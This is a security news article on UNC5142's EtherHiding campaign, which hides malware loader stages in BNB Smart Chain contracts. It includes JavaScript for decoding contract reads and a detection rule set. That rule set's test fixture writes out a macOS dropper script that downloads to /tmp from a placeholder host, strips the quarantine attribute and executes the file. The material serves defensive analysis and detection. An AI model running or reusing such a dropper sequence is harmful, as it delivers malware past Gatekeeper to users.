UNC5142's EtherHiding architecture on the BNB Smart Chain | Image: Mandiant
A new joint analysis by Mandiant Threat Defense and Google Threat Intelligence Group (GTIG) has exposed a financially motivated threat cluster, tracked as UNC5142, which uses blockchain technology to conceal and distribute information-stealing malware. By storing loader stages and configuration inside BNB Smart Chain smart contracts, the group gets infrastructure that no hosting provider or registrar can take down: contract code is immutable once deployed, and the chain's public nodes will serve it to anyone who asks. It is among the more technically sophisticated abuses of blockchain infrastructure seen in cybercrime to date.
According to Mandiant and GTIG, “since late 2023, UNC5142 has significantly evolved their tactics, techniques, and procedures (TTPs) to enhance operational security and evade detection.” The cluster abuses a method known as EtherHiding, which “obscures malicious code or data by placing it on a public blockchain, such as the BNB Smart Chain.”
Rather than serving malware from conventional servers, UNC5142 hides its loader stages and configuration inside smart contracts. Contract code cannot be altered or removed once deployed, so there is no server to seize and no domain to sinkhole; the contract's storage, by contrast, can be rewritten by whoever controls the contract, which is what makes the setup both durable and updatable. The victim's browser only performs read-only queries against a BNB Smart Chain RPC node, traffic that looks like any decentralized application and blends into normal blockchain activity.
“As of June 2025, GTIG had identified approximately 14,000 web pages containing injected JavaScript consistent with a UNC5142 compromised website.” These scripts are used to load CLEARSHORT, a JavaScript downloader that initiates the attack chain from vulnerable WordPress websites.
At the center of UNC5142's infection chain is CLEARSHORT, a multistage downloader that retrieves its later stages from smart contracts. The first stage is the JavaScript injected into the compromised site: it connects to the BNB Smart Chain using Web3.js, reads a secondary script out of a contract (a read-only call, so no transaction is created and the victim's browser leaves nothing on chain), and then displays a fake security prompt or "update" message to the victim.
Mandiant describes this process as a “multi-level smart contract system” where each contract plays a different operational role:
- First-level contracts act as routers pointing to the next contract address.
- Second-level contracts perform reconnaissance and victim fingerprinting.
- Third-level contracts host encrypted payload URLs and AES keys for final malware retrieval.
This proxy-style architecture mirrors the upgradeable-proxy pattern used in legitimate Solidity development, where an immutable entry-point contract forwards to logic and storage contracts that can be swapped out, which makes the system modular and cheap to adapt. "By separating the static logic from the dynamic configuration, UNC5142 can rapidly rotate domains, update lures, and change decryption keys with a single, cheap transaction."
Smart contracts offer unique advantages for cybercriminals. As the report explains, “storing malicious code within a smart contract makes it harder to detect with traditional web security tools that might scan website content directly.” Attackers also exploit “the ability to change stored data, such as a payload URL, without altering the permanent contract code.” This lets them update malicious infrastructure instantly while remaining operationally stable.
The operational cost is trivial: "A typical update, such as changing a lure URL or decryption key in the third-level contract, costs the actor between $0.25 and $1.50 USD in network fees." That efficiency enables large-scale campaigns with minimal overhead. The same property is also the defender's lever: every such update is a public, timestamped transaction sent from a wallet the actor had to fund, which is what lets the campaign's infrastructure and funding be reconstructed from the chain.
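The read that the first-stage script performs against the contract chain is worth seeing on the wire. Below is an added example written for this page, not code from UNC5142's loader or from Mandiant's report: it builds the JSON-RPC `eth_call` request a browser-side loader sends to an RPC node, parses such a request back out of a capture, and ABI-decodes the `string` a contract view function returns. Web3.js wraps exactly this exchange when a script calls a contract's read method, so the same decoding applies to what the library hands back. The contract address, the all-zero function selector and the `lure.invalid` URL are constructed placeholders.

```javascript
// Added example (not UNC5142's loader or Mandiant's tooling): what a read-only
// smart-contract query looks like on the wire and how to decode what it returns.
// The contract address, selector and stored string below are constructed.

// Constructed placeholders. A real selector is the first 4 bytes of
// keccak256("functionName()"); Node's standard library has no keccak, so an
// all-zero selector stands in for it here.
const SAMPLE_CONTRACT = "0x" + "0".repeat(36) + "beef";
const SAMPLE_SELECTOR = "0x00000000";
const SAMPLE_LURE_URL = "https://lure.invalid/verify"; // .invalid is a reserved TLD

// Build the JSON-RPC body a browser-side loader POSTs to an RPC node.
// eth_call runs a view function on the node: no transaction is created,
// no gas is paid and nothing is written on chain, so the victim's browser
// leaves no on-chain trace.
function buildEthCall(contract, selectorHex, id = 1) {
  if (!/^0x[0-9a-fA-F]{40}$/.test(contract)) throw new Error("bad contract address");
  return { jsonrpc: "2.0", id, method: "eth_call",
           params: [{ to: contract, data: selectorHex }, "latest"] };
}

// Pull the fields an analyst wants out of a captured request body
// (for example from a proxy log of a compromised site's visitor traffic).
function inspectRpcBody(json) {
  const req = JSON.parse(json);
  if (req.method !== "eth_call") return { readOnly: false, method: req.method };
  const call = Array.isArray(req.params) ? req.params[0] : undefined;
  if (!call || typeof call !== "object") throw new Error("malformed eth_call params");
  return { readOnly: true, method: "eth_call",
           contract: String(call.to).toLowerCase(), selector: String(call.data).slice(0, 10) };
}

// ABI-encode a single `string` return value:
// word 0 = offset of the string data (0x20 when it is the only value),
// word 1 = byte length, then the UTF-8 bytes padded to a 32-byte boundary.
function abiEncodeString(str) {
  const bytes = Buffer.from(str, "utf8");
  const padLen = Math.ceil(bytes.length / 32) * 32;
  const offset = Buffer.alloc(32); offset.writeUInt32BE(32, 28);
  const length = Buffer.alloc(32); length.writeUInt32BE(bytes.length, 28);
  const body = Buffer.concat([bytes, Buffer.alloc(padLen - bytes.length)]);
  return "0x" + Buffer.concat([offset, length, body]).toString("hex");
}

// Decode the `result` of an eth_call whose view function returns one `string`.
// Malformed data raises instead of yielding garbage.
function abiDecodeString(hexResult) {
  const hex = hexResult.startsWith("0x") ? hexResult.slice(2) : hexResult;
  if (hex.length % 64 !== 0) throw new Error("result is not 32-byte aligned");
  const buf = Buffer.from(hex, "hex");
  const offset = Number(buf.readBigUInt64BE(24));          // low 8 bytes of word 0
  if (offset + 32 > buf.length) throw new Error("offset points past payload");
  const length = Number(buf.readBigUInt64BE(offset + 24)); // low 8 bytes of the length word
  if (offset + 32 + length > buf.length) throw new Error("declared length exceeds payload");
  return buf.subarray(offset + 32, offset + 32 + length).toString("utf8");
}

// Decode a whole JSON-RPC response the way the loader would before using the value.
function decodeEthCallResponse(json) {
  const res = JSON.parse(json);
  if (res.error) throw new Error("rpc error: " + JSON.stringify(res.error));
  return abiDecodeString(res.result);
}

// Stand-alone demonstration: build the request, construct the node's answer as the
// encoded sample string, then recover it as a first stage (or an analyst) would.
function roundTripDemo() {
  const request = buildEthCall(SAMPLE_CONTRACT, SAMPLE_SELECTOR);
  const response = JSON.stringify({ jsonrpc: "2.0", id: request.id,
                                    result: abiEncodeString(SAMPLE_LURE_URL) });
  return { request, decoded: decodeEthCallResponse(response) };
}

console.log(JSON.stringify(roundTripDemo(), null, 2));
```

Run it with `node`. The printed request is the whole reason this traffic is hard to block on its own: a POST to a public RPC endpoint carrying a method the node answers for anyone, with no wallet involved and nothing distinguishing it from a dApp front end. Network-side detection therefore has to key on context (a WordPress page with no Web3 functionality suddenly issuing `eth_call` to a BNB Smart Chain node) rather than on the RPC call itself.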
UNC5142 has consistently refreshed its social engineering lures to appear legitimate.
- In early 2025, the group distributed fake reCAPTCHA and Data Privacy pages.
- By March 2025, they introduced a Cloudflare “Unusual Web Traffic” error page to prompt user interaction.
- In May 2025, they debuted an “Anti-Bot Verification” lure for Windows and macOS victims.
To host these pages, attackers abused Cloudflare Pages (*.pages.dev), leveraging the trust of Cloudflare’s infrastructure. The report notes:
“Cloudflare Pages is a legitimate service… these pages are less likely to be immediately blocked, and it is easy for the attackers to quickly create new pages if old ones are taken down.”
This blend of trusted hosting and blockchain-backed payload delivery makes UNC5142’s campaigns both highly resilient and difficult to dismantle.
Mandiant’s blockchain analysis revealed that UNC5142 operates two parallel infrastructures—referred to as Main and Secondary. Both are built on identical smart contract code and funded by wallets traced back to the OKX cryptocurrency exchange.
“The Main infrastructure stands out as the core campaign infrastructure… The Secondary infrastructure appears as a parallel, more tactical deployment, likely established to support a specific surge in campaign activity.”
This mirrored deployment model reflects a deliberate effort to maintain redundancy against takedowns while managing separate sets of lures and payloads simultaneously.
UNC5142 acts as a malware distribution cluster, delivering popular information-stealing malware across platforms:
- VIDAR and LUMMAC.V2 for Windows
- RADTHIEF for credential theft
- ATOMIC for macOS systems
In February and April 2025, the group targeted macOS specifically with bash scripts that downloaded ATOMIC via curl, wrote it to /tmp/update, and executed it after removing Apple's quarantine attribute. Gatekeeper's "downloaded from the internet" check keys on that attribute, so a binary without it runs as if it had been created locally, with no prompt. Mandiant describes this as "a deliberate defense evasion technique designed to remove the com.apple.quarantine attribute."
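The behaviours in that description (download via curl into /tmp, removal of com.apple.quarantine, chmod and execution) can be turned into a small rule set for triaging shell scripts pulled from a lure page or from an EDR script-execution event. The following is an added example constructed for this page, not Mandiant's detection content. Both sample scripts are constructed, and `lure.invalid` and `updates.example` are reserved names that do not resolve.

```javascript
// Added example (not Mandiant's detection content): a small rule set that flags a
// macOS shell dropper of the kind described above. Both scripts are constructed
// samples; lure.invalid and updates.example are reserved, non-routable names.

const DROPPER_SAMPLE = `#!/bin/bash
curl -s -o /tmp/update "https://lure.invalid/verify/update"
xattr -d com.apple.quarantine /tmp/update
chmod +x /tmp/update
/tmp/update
`;

const BENIGN_SAMPLE = `#!/bin/bash
# Version check for an installer: downloads to the user's folder, executes nothing
curl -fsSL "https://updates.example/version.txt" -o "$HOME/Downloads/version.txt"
cat "$HOME/Downloads/version.txt"
`;

// Each rule is one behaviour from the chain: fetch, drop in /tmp, strip the
// quarantine attribute Gatekeeper keys on, make executable, execute from /tmp.
// Weights reflect how specific each behaviour is on its own.
const RULES = [
  { id: "remote_fetch",     weight: 1, re: /\b(?:curl|wget)\b[^\n]*https?:\/\// },
  { id: "tmp_drop",         weight: 1, re: /-o\s*["']?\/tmp\/\S+/ },
  { id: "quarantine_strip", weight: 3, re: /\bxattr\b[^\n]*(?:com\.apple\.quarantine|\s-c\b)/ },
  { id: "chmod_exec",       weight: 1, re: /\bchmod\s+(?:\+x|[0-7]{3,4})\s+["']?\/tmp\// },
  { id: "tmp_exec",         weight: 2, re: /^\s*(?:(?:bash|sh|zsh|open)\s+)?["']?\/tmp\/\S+\s*$/m },
];

// Returns the matched rule ids, a weighted score and a verdict. Quarantine
// stripping combined with a /tmp drop or /tmp execution is the defining
// combination; stripping alone (a user unquarantining an app they installed
// on purpose) only rates "suspicious".
function scanShellScript(text) {
  const matched = RULES.filter(r => r.re.test(text));
  const hits = matched.map(r => r.id);
  const score = matched.reduce((sum, r) => sum + r.weight, 0);
  let verdict = "clean";
  if (hits.includes("quarantine_strip") && (hits.includes("tmp_drop") || hits.includes("tmp_exec"))) {
    verdict = "likely-dropper";
  } else if (score >= 3) {
    verdict = "suspicious";
  }
  return { verdict, score, hits };
}

console.log(scanShellScript(DROPPER_SAMPLE));
console.log(scanShellScript(BENIGN_SAMPLE));
```

The rules deliberately do not match on the curl download by itself; plenty of legitimate installers fetch over HTTPS. What separates the dropper is the combination, and in telemetry the same logic applies to process events: a `curl` writing under /tmp followed within seconds by `xattr -d com.apple.quarantine` and an execution from that path is the sequence to alert on.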
The report warns that “UNC5142 has demonstrated agility, flexibility, and an interest in adapting and evolving their operations.” Their ability to merge blockchain smart contracts, legitimate web services, and advanced JavaScript loaders signals a turning point for cybercriminal infrastructure.